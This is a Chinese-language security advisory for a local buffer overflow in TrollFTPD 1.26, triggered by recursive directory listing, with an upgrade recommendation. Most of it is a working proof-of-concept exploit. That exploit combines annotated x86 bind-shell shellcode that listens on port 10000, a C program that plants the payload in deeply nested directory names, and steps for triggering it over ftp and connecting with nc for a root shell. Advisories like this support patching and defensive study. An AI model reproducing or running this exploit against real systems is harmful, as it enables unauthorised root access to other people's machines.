TrollFTPD-1.26 存在本地漏洞

发布时间：2001-08-14
更新时间：2001-08-14
严重程度：高
威胁程度：本地管理员权限
错误类型：输入验证错误
利用方式：服务器模式

受影响系统

TrollFTPD 1.26

详细描述
TrollFTPD在处理递归目录列表处理中存在错误可以导致一次本地缓冲溢出，获得对ROOT SHELL的访问。

测试代码
offsets需要自己调整)

Run the program,
ftp localhost
<in ftp>
(your username)
(your password)
cd /tmp
ls -R

<out of ftp>
用 nc 连接10000端口。

char shellcode[] =
   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x31\xdb"                   // xor  ebx, ebx
   "\xf7\xe3"                   // mul  ebx
   "\xb0\x66"                   // mov     al, 102
   "\x53"                       // push    ebx
   "\x43"                       // inc     ebx
   "\x53"                       // push    ebx
   "\x43"                       // inc     ebx
   "\x53"                       // push    ebx
   "\x89\xe1"                   // mov     ecx, esp
   "\x4b"                       // dec     ebx
   "\xcd\x80"                   // int     80h
   "\x89\xc7"                   // mov     edi, eax
   "\x52"                       // push    edx
   "\x66\x68\x27\x10"           // push    word 4135
   "\x43"                       // inc     ebx
   "\x66\x53"                   // push    bx
   "\x89\xe1"                   // mov     ecx, esp
   "\xb0\x10"                   // mov  al, 16
   "\x50"                       // push eax
   "\x51"                       // push    ecx
   "\x57"                       // push    edi
   "\x89\xe1"                   // mov     ecx, esp
   "\xb0\x66"                   // mov     al, 102
   "\xcd\x80"                   // int     80h
   "\xb0\x66"                   // mov     al, 102
   "\xb3\x04"                   // mov     bl, 4
   "\xcd\x80"                   // int     80h
   "\x50"                       // push eax
   "\x50"                       // push eax
   "\x57"                       // push edi
   "\x89\xe1"                   // mov  ecx, esp
   "\x43"                       // inc  ebx
   "\xb0\x66"                   // mov  al, 102
   "\xcd\x80"                   // int  80h
   "\x89\xd9"                   // mov  ecx, ebx
   "\x89\xc3"                   // mov     ebx, eax
   "\xb0\x3f"                   // mov     al, 63
   "\x49"                       // dec     ecx
   "\xcd\x80"                   // int     80h
   "\x41"                       // inc     ecx
   "\xe2\xf8"                   // loop    lp
   "\x51"                       // push    ecx
   "\x68\x55\x55\x55\x55"       // push    dword 68732f6eh
   "\x68\x55\x55\x55\x55"       // push    dword 69622f2fh
   "\x89\xe3"                   // mov     ebx, esp
   "\x51"                       // push    ecx
   "\x53"                       // push ebx
   "\x89\xe1"                   // mov  ecx, esp
   "\xb0\x0b"                   // mov  al, 11
   "\xcd\x80";                  // int     80h

main()
{
char dir[8000];
char nir[8000];
int z0=0,a0=0x080597f8;
int z1=0,a1=0xbff96450;
int g;
strcpy(dir,"/tmp/retroll/");
mkdir(dir,0777);
printf("%d\n",strlen(shellcode));
while(strlen(dir)<4040)
{
  strcat(dir,"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/");
  mkdir(dir,0777);
}
// 4048 so far  leaving 48 left.
if(chdir(dir)){perror("chdir");exit(1);}
printf("%d + ",strlen(dir));
sprintf(dir,"AAAAAAAAAAAAAAAAAAAAAAAAAAAAA/");
mkdir(dir,0777);
system("cp /bin/sh AAAAAAAAAAAAAAAAAAAAAAAAAAAAA/UUUUUUUU");
sprintf(nir,"%sAAAAAAAAAAAAAAAAAAAAAAAA",dir);
sprintf(dir,"%sGGGG=AAAAAAA%sAAAAAAAAAAAA%sCCCC%s",nir,&a0,&a1,shellcode);
printf("%d = ",strlen(dir));
mkdir(dir,0777);
}

解决方案
升级到TrollFTPD-1.27 版本：

ftp://ftp.trolltech.com/freebies/ftpd/troll-ftpd-1.27.tar.gz

相关信息

最近严重漏洞

TrollFTPD-1.26 存在本地漏洞